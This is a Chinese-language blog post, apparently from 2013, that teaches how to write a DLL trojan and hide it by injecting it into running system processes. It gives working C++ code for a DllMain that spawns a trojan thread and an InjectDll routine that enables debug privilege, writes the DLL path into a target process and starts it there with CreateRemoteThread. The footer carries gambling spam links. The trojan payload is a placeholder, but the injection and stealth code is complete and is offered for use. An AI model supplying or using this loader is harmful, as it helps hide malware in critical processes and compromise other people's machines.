现在的位置: 首页 > 综合 > 正文

DLL线程注入思路

2013年10月05日 ⁄ 综合 ⁄ 共 4028字 ⁄ 字号 评论关闭
DLL木马,开始是在DLLMain()中加代码,但是后来发现不行,上网搜到一片文章,原因是要建立一个新进程。

线程注入木马也算是个不太新的方式了,但是在当时一度成为了恐慌.因为在进程中隐藏,而所注入的进程又是系统关键进程,无法终止.至于其他的木马神马神马吧,都是浮云.

       木马运行关键是隐藏,神不知鬼不觉才是王道.要隐藏,先要隐藏进程,Windows操作系统中程序以进程的方式运行,大多数操作系统也是如此.任务管理器就可以看到当前运行的进程,所以有人HOOK相关枚举进程的函数,让任务管理器不显示木马进程,也有人把自己的木马注册成服务运行,'任务管理器'不显示服务的.这样做只是障眼法,进程还是存在的,最好的方法是让进程不存在,让木马作为其他进程的一个线程来运行.Windows操作系统提出了DLL的概念,其系统API都是通过DLL的形式出现的,应用程序动态链接到DLL来调用API,DLL在内存中只存在一个副本就可以满足不同应用程序的调用了,因此可以把木马写成DLL文件,让他作为进程的一部分运行,最好是系统进程的一部分,一般人很难看到一个进程加载了哪些DLL,也就很难发现这种木马(用IceSword可以看到进程的DLL模块).

一、编写一个DLL木马:
使用IDE : Visual C++ 6.0 Visual Studio.NET
2003/2005都可以.
首先建立一个Win32 Dynamic-Link Library工程.选择 A simple DLL
project建立工程,然后就会看到:

  1. BOOL APIENTRY DllMain( HANDLE hModule, //
  2. 模块句柄.
  3. DWORD ul_reason_for_call, // 调用标志.
  4. LPVOID lpReserved // 返回数据.
  5. )
  6. {
  7. return TRUE;
  8. }

这个是DLL的入口点函数,只能做一些简单的初始化工作.这个函数和WinMain、wWinMain 、_tWinMain、main这四个标准的入口点函数是完全不同的,DllMain会被多次调用,上述四个入口点只被系统调用一次.顺便说一句dll文件结构和exe文件是完全一致的。

  1. DWORD ul_reason_for_call, //
  2. 调用标志.

这个参数由系统传递,用于判断调用DllMain函数时候的状态.可能是以下四个常量:

  1. DLL_PROCESS_ATTACH:
  2. //DLL被进程第一次使用时,就是进程调用LoadLibrary函数时
  4. DLL_THREAD_ATTACH:
  6. DLL_THREAD_DETACH:
  8. DLL_PROCESS_DETACH:
  9. //DLL被释放的时候

判断:当 ul_reason_for_call 等于
DLL_PROCESS_ATTACH
时就新开一个线程启动木马.记住一定要新开一个线程,不能把DllMain当main函数用.

  1. BOOL APIENTRY DllMain( HANDLE
  2. hModule,
  3. DWORD ul_reason_for_call,
  4. LPVOID lpReserved
  5. )
  6. {
  7. switch(ul_reason_for_call)
  8. {
  9. case DLL_PROCESS_ATTACH:
  10. // 启动木马线程.
  11. CreateThread(NULL,0,MainThread,0,0,0);
  12. break;
  14. case DLL_THREAD_ATTACH:
  15. break;
  17. case DLL_THREAD_DETACH:
  18. break;
  20. case DLL_PROCESS_DETACH:
  21. break;
  22. }
  23. return TRUE;
  24. }
  26. DWORD WINAPI MainThread(LPVOID
  27. lpParameter)
  28. {
  29. // 这里就是木马的代码了
  30. ... ...
  31. }

二 DLL木马的启动:

       远程进程插入启动木马:将木马DLL插入运行中的进程空间中,让其运行.
       具体做法是先将系统权限提升到DEBUG模式下,因为只有DEBUG模式才能打开进程句柄.然后用OpenProcess函数远程以
PROCESS_Create_THREAD , PROCESS_VM_OPERATION ,PROCESS_VM_WRITE 的权限打开要插入的进程,得到进程的句柄.用VirtualAllocEx函数给DLL文件的路径分配内存空间,用WriteProcessMemory函数将DLL文件内容写入进程空间中.用CreateRemoteThread函数启动就完成了进程的远程插入。

代码如下:

  1. ////////////////////////////////////////////////////////////////////////
  3. // 远程插入线程
  4. // char szDllFullPath[] DLL文件完整路径.
  5. // DWORD dwRemoteProcessID 要插入的进程ID号
  6. // 返回: TRUE 插入进程成功
  7. // FALSE 失败
  8. BOOL InjectDll(char szDllFullPath[],DWORD dwRemoteProcessID)
  9. {
  10. HANDLE hRemoteProcess;
  11. if(EnableDebugPriv(SE_DEBUG_NAME) == 0)
  12. {
  13. return FALSE;
  14. }
  16. // 打开远程线程
  17. if((hRemoteProcess = OpenProcess(PROCESS_Create_THREAD |
  18. PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,dwRemoteProcessID))==
  19. NULL)
  20. {
  21. return FALSE;
  22. }
  24. char * pszLibFileRemote;
  26. //使用VirtualAllocEx函数在远程进程内存地址空间分配DLL文件名缓冲区
  28. pszLibFileRemote = (char *)VirtualAllocEx(
  29. hRemoteProcess,NULL,lstrlen(szDllFullPath)+1,MEM_COMMIT,PAGE_READWRITE);
  31. if(pszLibFileRemote == NULL)
  32. {
  33. return FALSE;
  34. }
  36. if(WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(void
  37. *)szDllFullPath,lstrlen(szDllFullPath)+1,NULL) == 0)
  38. {
  39. return FALSE;
  40. }
  42. PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
  43. GetProcAddress(GetModuleHandle('Kernel32'),'LoadLibraryA');
  44. if(pfnStartAddr == NULL)
  45. {
  46. return FALSE;
  47. }
  48. // 通过建立远程连接的地址:pfnStartAddr
  49. // 传递参数 pszLibFileRemote 远程启动DLL
  50. // 启动远程线程 LoadLibraryA 通过远程线程调用用户的DLL文件
  51. HANDLE hRemoteThread;
  52. if((hRemoteThread =
  53. CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL))
  54. == NULL)
  55. {
  56. return FALSE;
  57. }
  58. return TRUE;
  59. }
  61. 这个函数也会用到的:
  64. ////////////////////////////////////////////////////////////////////////
  66. // 获取进程ID号
  67. // 如无此进程则返回 0;
  68. // char szProcName[] 进程名: .exe文件.
  69. DWORD GetProcID(char szProcName[])
  70. {
  71. HANDLE th = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  72. PROCESSENTRY32 pe = {sizeof(pe)};
  73. DWORD dwProcID = 0;
  75. BOOL bOK=Process32First(th,&pe);
  76. while(bOK)
  77. {
  78. bOK = Process32Next(th,&pe);
  80. LPCTSTR lpszExeFile = strrchr(pe.szExeFile,′//′);
  81. if(lpszExeFile == NULL)
  82. lpszExeFile = pe.szExeFile;
  83. else
  84. lpszExeFile++;
  86. if(strcmp(szProcName,lpszExeFile) == 0)
  87. {
  88. dwProcID = pe.th32ProcessID;
  89. break;
  90. }
  91. }
  93. return dwProcID;
  94. }
  97. ////////////////////////////////////////////////////////////////////////
  99. // 提升系统权限到DEBUG模式
  100. int EnableDebugPriv(char szName[])
  101. {
  102. HANDLE hToken;
  103. TOKEN_PRIVILEGES tp;
  104. LUID luid;
  106. // 打开进程环令牌
  107. if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
  109. {
  110. return 0;
  111. }
  112. if(!LookupPrivilegeValue(NULL,szName,&luid))
  113. {
  114. return 0;
  115. }
  116. tp.PrivilegeCount = 1;
  117. tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  118. tp.Privileges[0].Luid = luid;
  119. // 调整权限
  120. if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
  122. {
  123. return 0;
  124. }
  126. return 1;
  127. }

返回
【上篇】
【下篇】

作者:

抱歉!评论已关闭.

返回首页

Copyright © 2013-2018 学步园  保留所有权利.
软文销售 QQ客服:2265327166 点击这里给我发消息(其他合作也可洽谈)
必威体育
必威电竞